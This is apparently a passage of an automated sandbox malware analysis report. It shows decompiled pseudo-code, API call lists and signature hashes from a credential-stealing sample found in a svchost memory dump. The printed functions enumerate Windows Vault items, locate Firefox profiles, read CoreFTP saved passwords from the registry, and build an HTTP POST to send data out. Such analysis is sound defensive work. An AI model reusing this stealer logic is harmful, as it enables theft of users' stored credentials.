														_t114 =  *((intOrPtr*)(_t142 + 0x14));
														_t141 =  *(_t114 + 0x10);
														_v212 =  *((intOrPtr*)(_t137 + 0x10));
														_t138 =  &_v196;
														_push( &_v196);
														_push(_t129);
														_push(_t129);
														_push(_t137);
														_push(_t114);
														_push(_t142);
														_push(_v192);
														_v196 = _t129;
														if(_v232() == _t129) {
															E0BC04BBB(_v216, _t137, _t141, _v212,  *((intOrPtr*)( *((intOrPtr*)(_v196 + 0x1c)) + 0x10)));
															_t146 = _t146 + 0xc;
															_push(_v196);
															goto L17;
														}
													}
												} else {
													goto L11;
												}
											} else {
												L11:
												_t142 = _v184 + _v208;
												if(E0BC08D75(_t142, 0xbc10014) != 0) {
													_t136 =  *((intOrPtr*)(_t142 + 0x18));
													_t123 =  *((intOrPtr*)(_t142 + 0x14));
													_t141 =  *(_t123 + 0x10);
													_v212 =  *((intOrPtr*)(_t136 + 0x10));
													_t138 =  &_v204;
													_push( &_v204);
													_push(_t129);
													_push(_t129);
													_push(_t129);
													_push(_t136);
													_push(_t123);
													_push(_t142);
													_push(_v192);
													_v204 = _t129;
													if(_v228() == _t129) {
														E0BC04BBB(_v216, _t136, _t141, _v212,  *((intOrPtr*)( *((intOrPtr*)(_v204 + 0x1c)) + 0x10)));
														_t146 = _t146 + 0xc;
														_push(_v204);
														L17:
														_v180();
													}
												}
											}
											_v176 =  &(_v176->i);
											_v184 = _v184 + 0x38;
											_v200 = _v200 + 0x34;
										} while (_v176 < _v224);
									}
									_v180(_v208);
								}
							}
							_v172 =  &(_v172->i);
							_t90 = _v172;
							_v188 = _v188 + 0x10;
						} while (_v172 < _v220);
					}
				}
				return E0BC09FDC(_t90, _t129, _v12 ^ _t145, _t138, _t141, _t142);
			}







































                                                                                                                                        0x0bc05275
                                                                                                                                        0x0bc0527c
                                                                                                                                        0x0bc0528a
                                                                                                                                        0x0bc05290
                                                                                                                                        0x0bc05296
                                                                                                                                        0x0bc0529a
                                                                                                                                        0x0bc052a0
                                                                                                                                        0x0bc052b4
                                                                                                                                        0x0bc052c2
                                                                                                                                        0x0bc052c8
                                                                                                                                        0x0bc052ca
                                                                                                                                        0x0bc052d1
                                                                                                                                        0x0bc052db
                                                                                                                                        0x0bc052e9
                                                                                                                                        0x0bc052f7
                                                                                                                                        0x0bc052fd
                                                                                                                                        0x0bc0530d
                                                                                                                                        0x0bc05310
                                                                                                                                        0x0bc05316
                                                                                                                                        0x0bc05322
                                                                                                                                        0x0bc05328
                                                                                                                                        0x0bc0532e
                                                                                                                                        0x0bc05340
                                                                                                                                        0x0bc05341
                                                                                                                                        0x0bc05342
                                                                                                                                        0x0bc0534b
                                                                                                                                        0x0bc05357
                                                                                                                                        0x0bc0535e
                                                                                                                                        0x0bc0535f
                                                                                                                                        0x0bc05364
                                                                                                                                        0x0bc05372
                                                                                                                                        0x0bc05378
                                                                                                                                        0x0bc05384
                                                                                                                                        0x0bc0538a
                                                                                                                                        0x0bc05390
                                                                                                                                        0x0bc05396
                                                                                                                                        0x0bc053a0
                                                                                                                                        0x0bc053ac
                                                                                                                                        0x0bc053b6
                                                                                                                                        0x0bc053c3
                                                                                                                                        0x0bc053d5
                                                                                                                                        0x0bc05470
                                                                                                                                        0x0bc05484
                                                                                                                                        0x0bc05486
                                                                                                                                        0x0bc0548c
                                                                                                                                        0x0bc0548f
                                                                                                                                        0x0bc05492
                                                                                                                                        0x0bc05498
                                                                                                                                        0x0bc0549e
                                                                                                                                        0x0bc0549f
                                                                                                                                        0x0bc054a0
                                                                                                                                        0x0bc054a1
                                                                                                                                        0x0bc054a2
                                                                                                                                        0x0bc054a3
                                                                                                                                        0x0bc054a4
                                                                                                                                        0x0bc054aa
                                                                                                                                        0x0bc054b8
                                                                                                                                        0x0bc054d3
                                                                                                                                        0x0bc054d8
                                                                                                                                        0x0bc054db
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc054db
                                                                                                                                        0x0bc054b8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc053e8
                                                                                                                                        0x0bc053e8
                                                                                                                                        0x0bc053ee
                                                                                                                                        0x0bc05402
                                                                                                                                        0x0bc05408
                                                                                                                                        0x0bc0540e
                                                                                                                                        0x0bc05411
                                                                                                                                        0x0bc05414
                                                                                                                                        0x0bc0541a
                                                                                                                                        0x0bc05420
                                                                                                                                        0x0bc05421
                                                                                                                                        0x0bc05422
                                                                                                                                        0x0bc05423
                                                                                                                                        0x0bc05424
                                                                                                                                        0x0bc05425
                                                                                                                                        0x0bc05426
                                                                                                                                        0x0bc05427
                                                                                                                                        0x0bc0542d
                                                                                                                                        0x0bc0543b
                                                                                                                                        0x0bc0545a
                                                                                                                                        0x0bc0545f
                                                                                                                                        0x0bc05462
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc054e1
                                                                                                                                        0x0bc0543b
                                                                                                                                        0x0bc05402
                                                                                                                                        0x0bc054e7
                                                                                                                                        0x0bc054f3
                                                                                                                                        0x0bc054fa
                                                                                                                                        0x0bc05501
                                                                                                                                        0x0bc05396
                                                                                                                                        0x0bc05513
                                                                                                                                        0x0bc05513
                                                                                                                                        0x0bc05372
                                                                                                                                        0x0bc05519
                                                                                                                                        0x0bc0551f
                                                                                                                                        0x0bc05525
                                                                                                                                        0x0bc0552c
                                                                                                                                        0x0bc0532e
                                                                                                                                        0x0bc05322
                                                                                                                                        0x0bc05546

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(vaultcli.dll), ref: 0BC05290
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 0BC052AC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateVaults), ref: 0BC052BA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 0BC052C8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0BC052D7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0BC052E1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0BC052EF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 0BC052FD
                                                                                                                                        • GetVersionExA.KERNEL32(?,?,00000000,00000018), ref: 0BC053B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                        • String ID: 4$8$VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                        • API String ID: 1968650500-2979912482
                                                                                                                                        • Opcode ID: 8771c5a9e9a31658885659092d650af513c87d40bc265846e2240aab715cae5a
                                                                                                                                        • Instruction ID: e2c810f736af279729158471915b07ee90cc0781a4a2fa6f691d0e412b56cbd7
                                                                                                                                        • Opcode Fuzzy Hash: 8771c5a9e9a31658885659092d650af513c87d40bc265846e2240aab715cae5a
                                                                                                                                        • Instruction Fuzzy Hash: 2571B9B1E212299FDB209F55CC85F9EBBB9FB04254F0085EAE509A7241DB709E84CF61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC01BF7, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 168memorynetworkstringUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E0BC01BF7(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				short _v18;
				char _v20;
				signed int _v24;
				long _v28;
				char _v32;
				long _v44;
				char* _v48;
				signed short _v68;
				long _v72;
				intOrPtr _v76;
				void* _v92;
				void* __ebx;
				void* __esi;
				void* _t55;
				int _t60;
				char* _t73;
				void* _t76;
				short _t79;
				void* _t83;
				void* _t85;
				signed int _t86;
				char* _t87;
				void* _t97;
				void* _t98;
				void* _t105;

				_v24 = _v24 & 0x00000000;
				_v32 = 0x1000;
				_v12 = LocalAlloc(0x40, 0x1080);
				_t87 = LocalAlloc(0x40, 0x1080);
				_v8 = LocalAlloc(0x40, 0x1080);
				_t55 = LocalAlloc(0x40, 0x1080);
				_t97 = 0x3c;
				_v16 = _t55;
				E0BC08D5E( &_v92,  &_v92, 0, _t97);
				_v76 = _v12;
				_v92 = _t97;
				_v48 = _t87;
				_v72 = 0xfff;
				_v44 = 0xfff;
				_t60 = InternetCrackUrlA(_a4, 0, 0x80000000,  &_v92); // executed
				if(_t60 != 0 && _v76 != 0) {
					_v28 = 0xfff;
					if(InternetCreateUrlA( &_v92, 0x80000000, _v8,  &_v28) != 0) {
						_t98 = 0x3c;
						 *_t87 = 0;
						E0BC08D5E( &_v92,  &_v92, 0, _t98);
						_v92 = _t98;
						_v48 = _t87;
						_v72 = 0xfff;
						_v44 = 0xfff;
						if(InternetCrackUrlA(_v8, 0, 0,  &_v92) != 0 && _v76 != 0) {
							_t73 =  &_v32;
							__imp__ObtainUserAgentString(0, _v16, _t73); // executed
							if(_t73 < 0) {
								_push("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
							} else {
								_push(_v16);
							}
							_push(_a12);
							_push(_v12);
							_push(_t87);
							wsprintfA(_v8, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nUser-Agent: %s\r\nContent-Encoding: binary\r\n\r\n");
							_t76 = E0BC017C5(_t87, _t98, _v12, _v68 & 0x0000ffff); // executed
							_t105 = _t76;
							if(_t105 != 0) {
								_v20 = 1;
								_t79 = 0x2d;
								_v18 = _t79;
								__imp__#21(_t105, 0xffff, 0x80,  &_v20, 4); // executed
								_t83 = E0BC0184B(_v8, _t105, lstrlenA(_v8)); // executed
								if(_t83 != 0 && _a12 != 0) {
									_t85 = E0BC0184B(_a8, _t105, _a12); // executed
									if(_t85 != 0) {
										_t86 = E0BC018F2(_t105, _a16, _a20); // executed
										_v24 = _t86;
									}
								}
								__imp__#3(_t105); // executed
							}
						}
					}
				}
				E0BC08D3D(_v12);
				E0BC08D3D(_v8);
				E0BC08D3D(_t87);
				E0BC08D3D(_v16);
				return _v24;
			}































                                                                                                                                        0x0bc01bfd
                                                                                                                                        0x0bc01c12
                                                                                                                                        0x0bc01c1e
                                                                                                                                        0x0bc01c26
                                                                                                                                        0x0bc01c2d
                                                                                                                                        0x0bc01c30
                                                                                                                                        0x0bc01c34
                                                                                                                                        0x0bc01c36
                                                                                                                                        0x0bc01c3f
                                                                                                                                        0x0bc01c4d
                                                                                                                                        0x0bc01c63
                                                                                                                                        0x0bc01c66
                                                                                                                                        0x0bc01c69
                                                                                                                                        0x0bc01c6c
                                                                                                                                        0x0bc01c6f
                                                                                                                                        0x0bc01c73
                                                                                                                                        0x0bc01c93
                                                                                                                                        0x0bc01c9e
                                                                                                                                        0x0bc01ca6
                                                                                                                                        0x0bc01cae
                                                                                                                                        0x0bc01cb1
                                                                                                                                        0x0bc01cc1
                                                                                                                                        0x0bc01cc4
                                                                                                                                        0x0bc01cc7
                                                                                                                                        0x0bc01cca
                                                                                                                                        0x0bc01cd1
                                                                                                                                        0x0bc01ce2
                                                                                                                                        0x0bc01cea
                                                                                                                                        0x0bc01cf2
                                                                                                                                        0x0bc01cf9
                                                                                                                                        0x0bc01cf4
                                                                                                                                        0x0bc01cf4
                                                                                                                                        0x0bc01cf4
                                                                                                                                        0x0bc01cfe
                                                                                                                                        0x0bc01d01
                                                                                                                                        0x0bc01d04
                                                                                                                                        0x0bc01d0d
                                                                                                                                        0x0bc01d1e
                                                                                                                                        0x0bc01d23
                                                                                                                                        0x0bc01d28
                                                                                                                                        0x0bc01d2f
                                                                                                                                        0x0bc01d33
                                                                                                                                        0x0bc01d36
                                                                                                                                        0x0bc01d49
                                                                                                                                        0x0bc01d5d
                                                                                                                                        0x0bc01d66
                                                                                                                                        0x0bc01d74
                                                                                                                                        0x0bc01d7d
                                                                                                                                        0x0bc01d86
                                                                                                                                        0x0bc01d8e
                                                                                                                                        0x0bc01d8e
                                                                                                                                        0x0bc01d7d
                                                                                                                                        0x0bc01d92
                                                                                                                                        0x0bc01d92
                                                                                                                                        0x0bc01d28
                                                                                                                                        0x0bc01cd1
                                                                                                                                        0x0bc01c9e
                                                                                                                                        0x0bc01d9b
                                                                                                                                        0x0bc01da4
                                                                                                                                        0x0bc01dab
                                                                                                                                        0x0bc01db4
                                                                                                                                        0x0bc01dc1

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,00000000,00000000,00000000), ref: 0BC01C19
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C21
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C28
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C30
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,80000000,?), ref: 0BC01C6F
                                                                                                                                        • InternetCreateUrlA.WININET(?,80000000,?,00000000), ref: 0BC01C96
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0BC01CCD
                                                                                                                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 0BC01CEA
                                                                                                                                        • wsprintfA.USER32 ref: 0BC01D0D
                                                                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 0BC01D49
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC01D52
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 0BC01D92
                                                                                                                                        Strings
                                                                                                                                        • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0), xrefs: 0BC01CF9
                                                                                                                                        • POST %s HTTP/1.0Host: %sAccept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeUser-Agent: %sContent-Encoding: binary, xrefs: 0BC01D05
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal$Internet$Crack$AgentCreateObtainStringUserclosesocketlstrlensetsockoptwsprintf
                                                                                                                                        • String ID: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeUser-Agent: %sContent-Encoding: binary
                                                                                                                                        • API String ID: 3003103680-656120281
                                                                                                                                        • Opcode ID: 1ef1998c43e9a83fcc0bd22cd401f9e67903ccdc8d1cd2d51cb87db96fada140
                                                                                                                                        • Instruction ID: dbd16cbb6b1ffcce5f4987a6dc74416aff558384aa8559321fd6d82dff0dcadb
                                                                                                                                        • Opcode Fuzzy Hash: 1ef1998c43e9a83fcc0bd22cd401f9e67903ccdc8d1cd2d51cb87db96fada140
                                                                                                                                        • Instruction Fuzzy Hash: 12515871920319AEEF119FE5CC45FEEBBB8EF44710F244126FA04B6190DB719A41DBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC06713, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 132memorystringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 402 bc06713-bc06728 call bc0912b 405 bc06899-bc0689d 402->405 406 bc0672e-bc06738 call bc0912b 402->406 406->405 409 bc0673e-bc06746 call bc08f95 406->409 412 bc06748-bc0674d 409->412 413 bc0674f 409->413 414 bc06751-bc06793 call bc08ee2 * 2 LocalAlloc * 2 call bc090fc 412->414 413->414 421 bc06865-bc06891 call bc08d3d * 4 call bc06401 414->421 422 bc06799-bc067ab GetPrivateProfileSectionNamesA 414->422 448 bc06896 421->448 422->421 424 bc067b1-bc067b4 422->424 424->421 426 bc067ba 424->426 427 bc067bc-bc067ca StrStrIA 426->427 429 bc067d0-bc067ec GetPrivateProfileStringA 427->429 430 bc06851-bc0685f lstrlenA 427->430 429->430 432 bc067ee-bc06802 GetPrivateProfileIntA 429->432 430->421 430->427 434 bc06841-bc0684e call bc06401 432->434 435 bc06804-bc06813 call bc08ee2 432->435 434->430 443 bc06815-bc06819 435->443 444 bc06826-bc0682e call bc06401 435->444 443->444 446 bc0681b-bc0681e 443->446 451 bc06833-bc0683f call bc08d3d 444->451 449 bc06820 446->449 450 bc06823-bc06824 446->450 448->405 449->450 450->443 450->444 451->430
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E0BC06713(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				intOrPtr _v12;
				CHAR* _v16;
				void* __esi;
				void* _t25;
				void* _t27;
				CHAR* _t28;
				CHAR* _t31;
				void* _t39;
				long _t40;
				long _t43;
				int _t44;
				char* _t47;
				CHAR* _t50;
				char _t58;
				void* _t59;
				CHAR* _t61;
				intOrPtr _t62;
				CHAR* _t63;
				intOrPtr* _t65;

				_t59 = __edx;
				_t62 = _a8;
				_t25 = E0BC0912B(_t62);
				if(_t25 != 0) {
					_t25 = E0BC0912B(_a12);
					if(_t25 != 0) {
						_t27 = E0BC08F95(_t62);
						_push(_t62);
						if(_t27 != 0) {
							_t28 = 0;
						} else {
							_t28 = "\\";
						}
						_v12 = E0BC08EE2(_t28);
						_t31 = E0BC08EE2("profiles.ini", _t29);
						 *_t65 = 0xfe6a;
						_v8 = _t31;
						_t63 = LocalAlloc(0x40, ??);
						_v16 = _t63;
						_t50 = LocalAlloc(0x40, 0x1080);
						if(E0BC090FC(_v8) == 0) {
							L20:
							E0BC08D3D(_v12);
							E0BC08D3D(_t50);
							E0BC08D3D(_v8);
							E0BC08D3D(_t63); // executed
							_t39 = E0BC06401(_t59, _a4, _a8, _a12, _a8); // executed
							return _t39;
						} else {
							_t40 = GetPrivateProfileSectionNamesA(_t63, 0xfde8, _v8); // executed
							if(_t40 > 2 &&  *_t63 != 0) {
								_t61 = _t63;
								do {
									if(StrStrIA(_t61, "Profile") == 0) {
										goto L19;
									}
									_t43 = GetPrivateProfileStringA(_t61, "Path", 0xbc0d832, _t50, 0xfff, _v8); // executed
									if(_t43 == 0) {
										goto L19;
									}
									_t44 = GetPrivateProfileIntA(_t61, "IsRelative", 1, _v8); // executed
									if(_t44 != 1) {
										E0BC06401(_t59, _a4, _t50, _a12, _t50);
										_t65 = _t65 + 0x10;
										goto L19;
									}
									_t47 = E0BC08EE2(_t50, _v12);
									_t64 = _t47;
									if(_t47 == 0) {
										L17:
										E0BC06401(_t59, _a4, _t64, _a12, _t64); // executed
										E0BC08D3D(_t64);
										_t63 = _v16;
										_t65 = _t65 + 0x14;
										goto L19;
									} else {
										goto L13;
									}
									while(1) {
										L13:
										_t58 =  *_t47;
										if(_t58 == 0) {
											goto L17;
										}
										if(_t58 == 0x2f) {
											 *_t47 = 0x5c;
										}
										_t47 = _t47 + 1;
										if(_t47 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
									goto L17;
									L19:
									_t61 =  &(_t61[lstrlenA(_t61) + 1]);
								} while ( *_t61 != 0);
							}
							goto L20;
						}
					}
				}
				return _t25;
			}























                                                                                                                                        0x0bc06713
                                                                                                                                        0x0bc0671b
                                                                                                                                        0x0bc06721
                                                                                                                                        0x0bc06728
                                                                                                                                        0x0bc06731
                                                                                                                                        0x0bc06738
                                                                                                                                        0x0bc0673e
                                                                                                                                        0x0bc06743
                                                                                                                                        0x0bc06746
                                                                                                                                        0x0bc0674f
                                                                                                                                        0x0bc06748
                                                                                                                                        0x0bc06748
                                                                                                                                        0x0bc06748
                                                                                                                                        0x0bc06757
                                                                                                                                        0x0bc06760
                                                                                                                                        0x0bc0676b
                                                                                                                                        0x0bc06774
                                                                                                                                        0x0bc0677e
                                                                                                                                        0x0bc06782
                                                                                                                                        0x0bc0678a
                                                                                                                                        0x0bc06793
                                                                                                                                        0x0bc06865
                                                                                                                                        0x0bc06868
                                                                                                                                        0x0bc0686f
                                                                                                                                        0x0bc06878
                                                                                                                                        0x0bc0687f
                                                                                                                                        0x0bc06891
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06799
                                                                                                                                        0x0bc067a2
                                                                                                                                        0x0bc067ab
                                                                                                                                        0x0bc067ba
                                                                                                                                        0x0bc067bc
                                                                                                                                        0x0bc067ca
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc067e4
                                                                                                                                        0x0bc067ec
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc067f9
                                                                                                                                        0x0bc06802
                                                                                                                                        0x0bc06849
                                                                                                                                        0x0bc0684e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0684e
                                                                                                                                        0x0bc06809
                                                                                                                                        0x0bc0680e
                                                                                                                                        0x0bc06813
                                                                                                                                        0x0bc06826
                                                                                                                                        0x0bc0682e
                                                                                                                                        0x0bc06834
                                                                                                                                        0x0bc06839
                                                                                                                                        0x0bc0683c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06815
                                                                                                                                        0x0bc06815
                                                                                                                                        0x0bc06815
                                                                                                                                        0x0bc06819
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0681e
                                                                                                                                        0x0bc06820
                                                                                                                                        0x0bc06820
                                                                                                                                        0x0bc06823
                                                                                                                                        0x0bc06824
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06824
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06851
                                                                                                                                        0x0bc06858
                                                                                                                                        0x0bc0685c
                                                                                                                                        0x0bc067bc
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc067ab
                                                                                                                                        0x0bc06793
                                                                                                                                        0x0bc06738
                                                                                                                                        0x0bc0689d

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC0912B: GetFileAttributesA.KERNELBASE(?,0BC06726), ref: 0BC09135
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0BC06777
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080), ref: 0BC06785
                                                                                                                                        • GetPrivateProfileSectionNamesA.KERNEL32 ref: 0BC067A2
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,Profile), ref: 0BC067C2
                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(00000000,Path,0BC0D832,00000000,00000FFF,?), ref: 0BC067E4
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0BC067F9
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0BC06852
                                                                                                                                          • Part of subcall function 0BC06401: FindFirstFileA.KERNELBASE(?,?,?,00000000,00000140), ref: 0BC0648E
                                                                                                                                          • Part of subcall function 0BC06401: lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC064C3
                                                                                                                                          • Part of subcall function 0BC06401: lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC064D9
                                                                                                                                          • Part of subcall function 0BC06401: FindNextFileA.KERNELBASE(?,00000010), ref: 0BC066DA
                                                                                                                                          • Part of subcall function 0BC06401: FindClose.KERNELBASE(?), ref: 0BC066EE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFindPrivateProfile$AllocLocallstrcmpilstrlen$AttributesCloseFirstNamesNextSectionString
                                                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                        • API String ID: 3672316223-4107377610
                                                                                                                                        • Opcode ID: 465baf3983fb2ab2cf8d51e3658a1ee88abf0f2af27dd1159943e6a3925a807a
                                                                                                                                        • Instruction ID: 6bd93800c8505c063e161b823bcc9f341008a321cbbb58a2a26983202f8074bf
                                                                                                                                        • Opcode Fuzzy Hash: 465baf3983fb2ab2cf8d51e3658a1ee88abf0f2af27dd1159943e6a3925a807a
                                                                                                                                        • Instruction Fuzzy Hash: 14410371935205BFEF116FA4CC06B6E3BA9EF00644F148174FA00A61C1EF71CA21ABB1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC03972, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 181registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E0BC03972(void* __ecx, void* __edx) {
				signed int _v8;
				char _v2056;
				void* _v2060;
				int* _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				int _v2076;
				intOrPtr _v2080;
				char* _v2084;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr* _v2096;
				char _v2100;
				intOrPtr _v2104;
				char _v2108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				long _t53;
				intOrPtr _t60;
				char* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t95;
				void* _t103;
				void* _t106;
				void* _t107;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t115;

				_t106 = __edx;
				_t50 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t50 ^ _t110;
				_t107 = __ecx; // executed
				_t53 = RegOpenKeyA(0x80000001, "Software\\FTPWare\\COREFTP\\Sites",  &_v2060); // executed
				if(_t53 != 0) {
					L19:
					return E0BC09FDC(_t53, _t95, _v8 ^ _t110, _t106, _t107, _t108);
				}
				_push(_t108);
				_v2064 = 0;
				_v2076 = 0x7ff;
				if(RegEnumKeyExA(_v2060, 0,  &_v2056,  &_v2076, 0, 0, 0, 0) != 0) {
					L18:
					_t53 = RegCloseKey(_v2060);
					_pop(_t108);
					goto L19;
				}
				_push(_t95);
				do {
					_t60 = E0BC08F32(E0BC08EE2("\\", "Software\\FTPWare\\COREFTP\\Sites"),  &_v2056);
					_t96 = _t60;
					_v2104 = _t60;
					_v2072 = E0BC08DDA(0,  *0xbc10010, _t60, "PW", 0, 0);
					_v2068 = E0BC08DDA(0,  *0xbc10010, _t96, "Host", 0, 0);
					_v2080 = E0BC08DDA(0,  *0xbc10010, _t96, "User", 0, 0);
					_t64 = E0BC08DDA(0,  *0xbc10010, _t96, "PthR", 0, 0);
					_t113 = _t111 + 0x5c;
					_v2084 = _t64;
					if(_t64 == 0) {
						_v2084 = " ";
					}
					_t66 = E0BC08DDA(0,  *0xbc10010, _t96, "Port",  &_v2108, 0);
					_t114 = _t113 + 0x14;
					if(_t66 == 0 || _v2108 != 4) {
						E0BC08D3D(_t66);
						_v2092 = 0x15;
					} else {
						_v2092 =  *_t66;
						E0BC08D3D(_t66);
					}
					_pop(_t103);
					_t69 = E0BC08DDA(0,  *0xbc10010, _t96, "SSH",  &_v2100, 0);
					_t115 = _t114 + 0x14;
					_v2096 = _t69;
					if(_v2072 != 0 && _v2068 != 0 && _v2080 != 0) {
						_v2088 = 0xbeef0010;
						E0BC08A41( &_v2088, _t103, _t107, 4);
						E0BC08C6D(_t107, _t103, _v2068);
						E0BC08C6D(_t107, _t103, _v2080);
						E0BC08C6D(_t107, _t103, _v2072);
						E0BC08C37(_v2092);
						E0BC08C6D(_t107, _t103, _v2084);
						_t90 = _v2096;
						_t115 = _t115 + 0x14;
						if(_v2096 == 0 || _v2100 != 4) {
							_v2088 = 0;
							E0BC08A41( &_v2088, _t103, _t107, 4);
						} else {
							E0BC08C37( *_t90);
						}
					}
					E0BC08D3D(_v2072);
					E0BC08D3D(_v2068);
					E0BC08D3D(_v2080);
					E0BC08D3D(_v2084);
					E0BC08D3D(_v2096);
					E0BC08D3D(_v2104);
					_t111 = _t115 + 0x18;
					_v2064 = _v2064 + 1;
					_v2076 = 0x7ff;
				} while (RegEnumKeyExA(_v2060, _v2064,  &_v2056,  &_v2076, 0, 0, 0, 0) == 0);
				_pop(_t95);
				goto L18;
			}





































                                                                                                                                        0x0bc03972
                                                                                                                                        0x0bc0397b
                                                                                                                                        0x0bc03982
